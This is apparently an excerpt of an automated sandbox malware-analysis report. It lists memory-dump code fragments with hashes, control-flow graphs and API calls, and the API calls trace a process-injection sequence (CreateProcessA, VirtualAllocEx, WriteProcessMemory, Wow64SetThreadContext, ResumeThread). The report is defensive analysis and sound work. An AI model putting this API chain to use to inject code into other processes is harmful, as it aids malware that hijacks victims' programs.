                                                      • Instruction ID: d16181ddd4df7446cd7674e5bf50515a136ad2aa47c8056017df03b151e37d96
                                                      • Opcode Fuzzy Hash: 7bcd75d312fb1f2978cbfe23c7dd9a05b2da63e4c1d6805a9d43dc22d7968223
                                                      • Instruction Fuzzy Hash: F622C074E102298FDB54CFA9C981B9DFBB2BF88301F2482A9D819E7345D734A985CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c81fc44f0f8bd6644d0d60e9593c063f1c6d8d7349b703447257ee2b17fce3b1
                                                      • Instruction ID: 2c9f45403a1051cd508840199f44808057dbbee36f495c2b7ca5549776cb0f23
                                                      • Opcode Fuzzy Hash: c81fc44f0f8bd6644d0d60e9593c063f1c6d8d7349b703447257ee2b17fce3b1
                                                      • Instruction Fuzzy Hash: 65C11874E102198FDB14DFA9C891B9EFBB2AF89305F2084A9D809E7351DB309E85CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398889244.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_730000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4605a7e54b3f5c303d080adf1429b3ae7f782ae6b4f3243103b1b41c22e2f679
                                                      • Instruction ID: bc97edf6c736054042ea65f45cc47c3a2f129efec8901e19d7ac9055df794256
                                                      • Opcode Fuzzy Hash: 4605a7e54b3f5c303d080adf1429b3ae7f782ae6b4f3243103b1b41c22e2f679
                                                      • Instruction Fuzzy Hash: 4FE0463880E388CFD701DF20AC911F8BBFDAB0B311F542096884E9B2A3D73888589B15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398889244.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_730000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ca611b063997881fa51f821abeab6e3bc63c591d222db72663dd46a6c538b2d
                                                      • Instruction ID: d417d4ec4fe5ee6d3a24fa98f15105ddb778253de4d715f63049d9d82d2e1985
                                                      • Opcode Fuzzy Hash: 7ca611b063997881fa51f821abeab6e3bc63c591d222db72663dd46a6c538b2d
                                                      • Instruction Fuzzy Hash: B7E01778C0E284CFD742DB609D956F4BBFDAB0B341F5824EA8449A7263C23884149F29
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1056 730040-7300d9 1058 730122-73014a 1056->1058 1059 7300db-7300f2 1056->1059 1062 730190-7301e6 1058->1062 1063 73014c-730160 1058->1063 1059->1058 1064 7300f4-7300f9 1059->1064 1072 7301e8-7301fc 1062->1072 1073 73022c-730323 CreateProcessA 1062->1073 1063->1062 1074 730162-730167 1063->1074 1065 7300fb-730105 1064->1065 1066 73011c-73011f 1064->1066 1067 730107 1065->1067 1068 730109-730118 1065->1068 1066->1058 1067->1068 1068->1068 1071 73011a 1068->1071 1071->1066 1072->1073 1081 7301fe-730203 1072->1081 1092 730325-73032b 1073->1092 1093 73032c-730411 1073->1093 1075 73018a-73018d 1074->1075 1076 730169-730173 1074->1076 1075->1062 1078 730177-730186 1076->1078 1079 730175 1076->1079 1078->1078 1082 730188 1078->1082 1079->1078 1084 730226-730229 1081->1084 1085 730205-73020f 1081->1085 1082->1075 1084->1073 1086 730213-730222 1085->1086 1087 730211 1085->1087 1086->1086 1089 730224 1086->1089 1087->1086 1089->1084 1092->1093 1105 730413-730417 1093->1105 1106 730421-730425 1093->1106 1105->1106 1107 730419 1105->1107 1108 730427-73042b 1106->1108 1109 730435-730439 1106->1109 1107->1106 1108->1109 1110 73042d 1108->1110 1111 73043b-73043f 1109->1111 1112 730449-73044d 1109->1112 1110->1109 1111->1112 1113 730441 1111->1113 1114 730483-73048e 1112->1114 1115 73044f-730478 1112->1115 1113->1112 1118 73048f 1114->1118 1115->1114 1118->1118
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00730307
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398889244.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_730000_html.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 1d06bd6d29232ace248983239e90508000acadeb2725edf7cb59618026b6fa6c
                                                      • Instruction ID: b6a8a79e94f24ae5fcc40fa100c011f2870cb0820e88a1be86d99ff84c5b6952
                                                      • Opcode Fuzzy Hash: 1d06bd6d29232ace248983239e90508000acadeb2725edf7cb59618026b6fa6c
                                                      • Instruction Fuzzy Hash: 75C147B0D0022D8FEF24CFA4C855BEEBBB1BB49300F1091A9D819B7241DB749A85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1232 25f7d9-25f84b 1235 25f862-25f8c9 WriteProcessMemory 1232->1235 1236 25f84d-25f85f 1232->1236 1238 25f8d2-25f924 1235->1238 1239 25f8cb-25f8d1 1235->1239 1236->1235 1239->1238
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 78bffb84885a3f62a762607be26471e9cbf9bf4fad7cfa21ed2bcf44ef249c97
                                                      • Instruction ID: b68f6d15659b1ab0cb392d4507adc6b518ffb5ade8d0266a3e7ed5b0f8e35ad2
                                                      • Opcode Fuzzy Hash: 78bffb84885a3f62a762607be26471e9cbf9bf4fad7cfa21ed2bcf44ef249c97
                                                      • Instruction Fuzzy Hash: F941ABB5D012599FDF00CFA9D984ADEFBB1BB49310F24942AE814BB210D335AA55CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1244 25f7e0-25f84b 1246 25f862-25f8c9 WriteProcessMemory 1244->1246 1247 25f84d-25f85f 1244->1247 1249 25f8d2-25f924 1246->1249 1250 25f8cb-25f8d1 1246->1250 1247->1246 1250->1249
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: d745550c9f56f5d53f054a90fe30d7c796e14dcc2dcb02b2378a0f04301c89c5
                                                      • Instruction ID: d712647bd0e96259357b73269af5a12d8f60cbdedfe64684547bfb81fa6cc453
                                                      • Opcode Fuzzy Hash: d745550c9f56f5d53f054a90fe30d7c796e14dcc2dcb02b2378a0f04301c89c5
                                                      • Instruction Fuzzy Hash: B741ABB5D012589FDF00CFA9D984ADEBBF1BB49310F20942AE814BB210D775AA55CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1255 25f938-25f93c 1256 25f95d-25fa08 ReadProcessMemory 1255->1256 1257 25f93e-25f95b 1255->1257 1261 25fa11-25fa63 1256->1261 1262 25fa0a-25fa10 1256->1262 1257->1256 1262->1261
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a2ca2f949fd3767d4150eb0c90458bd930501335e63eb72c236e57658f66712e
                                                      • Instruction ID: d04c5b021db73f0a137beb0452df7240210f26eb8e3b2b8d465e91c97b64ce62
                                                      • Opcode Fuzzy Hash: a2ca2f949fd3767d4150eb0c90458bd930501335e63eb72c236e57658f66712e
                                                      • Instruction Fuzzy Hash: 3B41BBB4D002599FCF00CFA9D984AEEFBB1BF49310F20942AE814B7210D775A955CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1277 25f940-25fa08 ReadProcessMemory 1281 25fa11-25fa63 1277->1281 1282 25fa0a-25fa10 1277->1282 1282->1281
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: d1a75126f9b9c1f6a9ecad031035f2f64e1cf80f47a9c1f5be58a9f44ff3bd25
                                                      • Instruction ID: 049aeaa30780b783000455c56f5e397c49281aa00dfa9942e3945aff595c4d39
                                                      • Opcode Fuzzy Hash: d1a75126f9b9c1f6a9ecad031035f2f64e1cf80f47a9c1f5be58a9f44ff3bd25
                                                      • Instruction Fuzzy Hash: EF4199B4D00258DFCF00CFA9D984AEEFBB1BB49310F20942AE814B7210D775A955DF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1267 25f6b0-25f778 VirtualAllocEx 1271 25f781-25f7cb 1267->1271 1272 25f77a-25f780 1267->1272 1272->1271
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: eadd6358e4d482b31283c3cf9cb115ad5094e3ba28068052824ca83a4fe862f8
                                                      • Instruction ID: 7660107f07ef0e2a186cc340a0eb34490c790f2ad897b70dd38de2048d8bc4ab
                                                      • Opcode Fuzzy Hash: eadd6358e4d482b31283c3cf9cb115ad5094e3ba28068052824ca83a4fe862f8
                                                      • Instruction Fuzzy Hash: 1641AAB8D002589FCF10CFA9D984ADEFBB5BB49310F20942AE814BB210D775A955CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1287 25f6b8-25f778 VirtualAllocEx 1290 25f781-25f7cb 1287->1290 1291 25f77a-25f780 1287->1291 1291->1290
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: fde60535cd102276fbefe9e95241811695560d89912061fe3738fc1fbc1a043d
                                                      • Instruction ID: bc26b01e1e22b07ce41a4f4f7679a21525e5362b004bc1b810e7f12ef97b9f9d
                                                      • Opcode Fuzzy Hash: fde60535cd102276fbefe9e95241811695560d89912061fe3738fc1fbc1a043d
                                                      • Instruction Fuzzy Hash: 2D41A8B8D002589FCF00CFA9D984ADEFBB1AB49310F20942AE814BB210D775A915CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1296 25f581-25f5e8 1298 25f5ff-25f64d Wow64SetThreadContext 1296->1298 1299 25f5ea-25f5fc 1296->1299 1301 25f656-25f6a2 1298->1301 1302 25f64f-25f655 1298->1302 1299->1298 1302->1301
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 6462f45e37cbf908cca78248590389ecfd18abd1829fa478513c57fd8d4b4246
                                                      • Instruction ID: 1c7ca402bff9a14df083dac0bbc8801d59d179cd89caf7da70fe193c5673b2f6
                                                      • Opcode Fuzzy Hash: 6462f45e37cbf908cca78248590389ecfd18abd1829fa478513c57fd8d4b4246
                                                      • Instruction Fuzzy Hash: 2241BBB4D10258DFDB10CFA9D984AEEFBF1BB49314F24842AE818B7250D739A949CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1307 25f588-25f5e8 1309 25f5ff-25f64d Wow64SetThreadContext 1307->1309 1310 25f5ea-25f5fc 1307->1310 1312 25f656-25f6a2 1309->1312 1313 25f64f-25f655 1309->1313 1310->1309 1313->1312
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: bf06d634563cf31f2e8159dda8f5d1377f313ee83a212f3efdb1232594090e09
                                                      • Instruction ID: ac6f0e22af440b151743db5244091aa7c8ffbab57ca90b7021149fd6a87147f1
                                                      • Opcode Fuzzy Hash: bf06d634563cf31f2e8159dda8f5d1377f313ee83a212f3efdb1232594090e09
                                                      • Instruction Fuzzy Hash: 7441BCB4D102589FDB10CFA9D984AEEBBF5AB49310F24842AE818B7250D778A949CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1318 25ec20-25ecbc ResumeThread 1322 25ecc5-25ed07 1318->1322 1323 25ecbe-25ecc4 1318->1323 1323->1322
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0025ECA6
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 6f719d7eb4530074d65994edd78d90b557119f570746dd5284178f3fd30679fe
                                                      • Instruction ID: 0131d2692b66f1cb68d863509eefe201a430033c39df08575c1689f1a640ac4d
                                                      • Opcode Fuzzy Hash: 6f719d7eb4530074d65994edd78d90b557119f570746dd5284178f3fd30679fe
                                                      • Instruction Fuzzy Hash: EA31CAB4D10218DFDF14CFA9D984AEEFBB1AB89310F24842AE818B7210D735A905CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0025ECA6
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 4db7985c6077e2e5d0d67c4d2113c1a0b90114d2f70cb37385ecb8c7aa670b61
                                                      • Instruction ID: 9dc8018ebabf40abe4d0fe64a94e0915ff5276becf1c791e2f2ac6a4e3b16a55
                                                      • Opcode Fuzzy Hash: 4db7985c6077e2e5d0d67c4d2113c1a0b90114d2f70cb37385ecb8c7aa670b61
                                                      • Instruction Fuzzy Hash: B831D9B4D102189FDF14CFA9D984ADEFBB4EB89310F20842AE818B7300D735A905CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adbcc8aa8ae1aa7b5391f823e66fcd21ebdb0dc2bb4eede19034df079aace5ea
                                                      • Instruction ID: e32e1c1164af429cb9747ba205e855671e1f5e791b8678994153be1ab9124e2f
                                                      • Opcode Fuzzy Hash: adbcc8aa8ae1aa7b5391f823e66fcd21ebdb0dc2bb4eede19034df079aace5ea
                                                      • Instruction Fuzzy Hash: D461B474E05208CFDB08CFA5D994AEEFBB6BF89301F20912AD419AB365D7309945DF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ab816e1e33df13f7c38e796cb9e7ee13e5b0c81b415726792827ff93ad271da
                                                      • Instruction ID: 8c96cccd521f36d39035c6d9b254989b18a08c7b1abdcca4a4ca337314cf61cc
                                                      • Opcode Fuzzy Hash: 5ab816e1e33df13f7c38e796cb9e7ee13e5b0c81b415726792827ff93ad271da
                                                      • Instruction Fuzzy Hash: 6A51D374E042089FDB05DFA9E885AEEBBF6FB89301F609065E805B7365CB349945CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c3ffa78fee33ea3056d89fd0f84bf570cf8c69828bdc23d85a44408066367f1
                                                      • Instruction ID: cd3a725e4d31d51147a304110d46fbd9092081e5ecff2f3a22514f1f45c5276b
                                                      • Opcode Fuzzy Hash: 0c3ffa78fee33ea3056d89fd0f84bf570cf8c69828bdc23d85a44408066367f1
                                                      • Instruction Fuzzy Hash: 5641F274E012189FCB04DFA8D984AEEBBB1FB4C321F149555E810B3365DB31A994CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80272145d507a0b9655209f1cba9ea552224dab0a553eec50941bd04033a809e
                                                      • Instruction ID: d28cf3da3105e17c74f7370a9c8f1aed36bf55af9876dee8108d3d127d897b14
                                                      • Opcode Fuzzy Hash: 80272145d507a0b9655209f1cba9ea552224dab0a553eec50941bd04033a809e
                                                      • Instruction Fuzzy Hash: 70411374E002199FCB04DFA9D580AAEF7B2EB89310F24846AE855E7340DB31D902CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1face931aa2d2230c06b760a46b70f2bfae0eb8953b5419fc614fa63ebb0bb00
                                                      • Instruction ID: aecbf5001f715296f9fb20f71bd3ad8ca0ec59afa64d37f03ea24712cc8bc0ec
                                                      • Opcode Fuzzy Hash: 1face931aa2d2230c06b760a46b70f2bfae0eb8953b5419fc614fa63ebb0bb00
                                                      • Instruction Fuzzy Hash: 2241D0B5D1521CDBCB08CFA8D884AEDFBB5FF48311F14912AD459A7211D730A955CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ae2ed2491e371b802f418029141b58a381af3baac475a2d06a291ff71e9e5d0
                                                      • Instruction ID: 2c6c5a63fdfcb57641137487a4bff820ee8521805d3dfecc7180b8d1ccec6647
                                                      • Opcode Fuzzy Hash: 2ae2ed2491e371b802f418029141b58a381af3baac475a2d06a291ff71e9e5d0
                                                      • Instruction Fuzzy Hash: 6A314C78E002099FDB05DF98D881AEEBBB1FF49310F108565E904B7394DB709A41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_cd000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b24d3ae0972c68641f26aeab9c05a16bad31542cbf1f10ef9bbc4b2b04e3e9f
                                                      • Instruction ID: 384fcc3a594544b326b53f3349db85a83f38a80697b5c99dcb90ad4d8117fd3c
                                                      • Opcode Fuzzy Hash: 7b24d3ae0972c68641f26aeab9c05a16bad31542cbf1f10ef9bbc4b2b04e3e9f
                                                      • Instruction Fuzzy Hash: DC21AF75604340DFEB24DF18D884F1ABBA5EB84314F34C6BEE9494B246C336D856CAA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_cd000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5e10ddde0beb98204c734a35da197ab784c520951dfbcb07bc5e52c524de218
                                                      • Instruction ID: 072f7c880c57057b96ee5c8a6153849dabb27f5f5ef9b60ef982cdb97faebde4
                                                      • Opcode Fuzzy Hash: d5e10ddde0beb98204c734a35da197ab784c520951dfbcb07bc5e52c524de218
                                                      • Instruction Fuzzy Hash: 1521D0B5604300EFEB11DF10D9C4F2ABBA1EB94314F24C6BEE8494B282C336D846DB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d218dddbddf4ba6be71896c46f9c0c981c9d08ce7cf6ed07b87463793f6c033e
                                                      • Instruction ID: 7c71cbbf5e5d9eff70d687f7165debb2874ee97dfa3376c225b5c041413b7821
                                                      • Opcode Fuzzy Hash: d218dddbddf4ba6be71896c46f9c0c981c9d08ce7cf6ed07b87463793f6c033e
                                                      • Instruction Fuzzy Hash: 1431BE74A10A08DFD748DF5AE68499DBBF1FF88305F6280D4D844AB369EB30AE54DB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_cd000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 04ee2cc03feb2e60b9518c1080a430690b0961dda54e488a29dc9cc76c870925
                                                      • Instruction ID: 40c097a2b4d64f445e0cab08808d2fd568358b129f573f06c8a57785d86ff72c
                                                      • Opcode Fuzzy Hash: 04ee2cc03feb2e60b9518c1080a430690b0961dda54e488a29dc9cc76c870925
                                                      • Instruction Fuzzy Hash: 5E2180755083809FDB02CF14D994B15BFB1EB46314F28C5EBD8498F267C33A985ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b8404483655f12f7b59dd7cc983dd120ae4b09de4420d9eb282217f3c46d961
                                                      • Instruction ID: 2df1841f97537a72b999f2803b274cc97b4ab24b0c348b99188bb756a2c06ee5
                                                      • Opcode Fuzzy Hash: 5b8404483655f12f7b59dd7cc983dd120ae4b09de4420d9eb282217f3c46d961
                                                      • Instruction Fuzzy Hash: F821CCB4D09209DFCB44CF99D6809AEBBF6FB58300F205155D809A7715D730AE41DF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_cd000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction ID: 49d24d47087e4254a4763ae83ddf2c38f187ceb672198981c1675b94ef943fdf
                                                      • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction Fuzzy Hash: F111BB75504280DFDB41CF10C9C4B19BFA1FB94314F24C6AED8494B696C33AD84ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_d30000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc9b0fb0ef265d8c456654427d8745d6b0499bcbf14a1402c9ae25457196169c
                                                      • Instruction ID: abb340aade175cfe30e0923fd2405796d04cf50f5eac2c6919ad5ee40fcf19b4
                                                      • Opcode Fuzzy Hash: bc9b0fb0ef265d8c456654427d8745d6b0499bcbf14a1402c9ae25457196169c
                                                      • Instruction Fuzzy Hash: 1D110434A10608DFC785DF98F58498DBBF4FB48316F5240D4E88493739DB30AAA0CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
